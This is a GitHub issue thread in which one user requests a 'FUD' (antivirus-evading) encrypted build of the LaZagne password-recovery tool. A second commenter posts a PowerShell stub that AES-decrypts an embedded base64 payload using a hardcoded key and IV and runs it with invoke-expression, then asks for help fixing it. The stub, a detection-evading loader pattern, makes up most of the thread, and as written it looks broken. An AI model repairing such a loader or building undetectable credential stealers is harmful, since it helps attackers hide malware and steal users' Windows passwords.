Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Usama please sendme LaZagne FUD #2

Open
owl-city opened this issue Jan 17, 2020 · 1 comment
Open

Usama please sendme LaZagne FUD #2

owl-city opened this issue Jan 17, 2020 · 1 comment

Comments

@owl-city
Copy link

Hi Usama, please I need you to help me encrypt LaZagne to do security tests, I am new to computer security and I am starting to program with python, to tell you the truth I do not understand much, but I am very interested in the issue of password security of windows. Do you think you can help me?

@0xcreston
Copy link

$key = [Convert]::FromBase64String("MQfvod1coM/nC/JH1BjNmX0rvqtokiLICQHKbe3XCL4=")
$iv = [Convert]::FromBase64String("bT22rQTh5wCVt1YPC5Jluw==")
$Payload = "RMEtkmBIQSb6oaHd/gwMYQ==";
$aesManaged = New-Object "System.Security.Cryptography.AesManaged";
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
$aesManaged.BlockSize = 128;
$aesManaged.KeySize = 256;
$unencryptedData = [System.Text.Encoding]::UTF8.GetString($aesManaged.CreateDecryptor().TransformFinalBlock($Payload,0,$Payload.Length)).Trim([char]0);
$aesManaged.Dispose();
invoke-expression $unencryptedData;

Help me fix this script please i really need to use the key & iv instead of the default method used.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants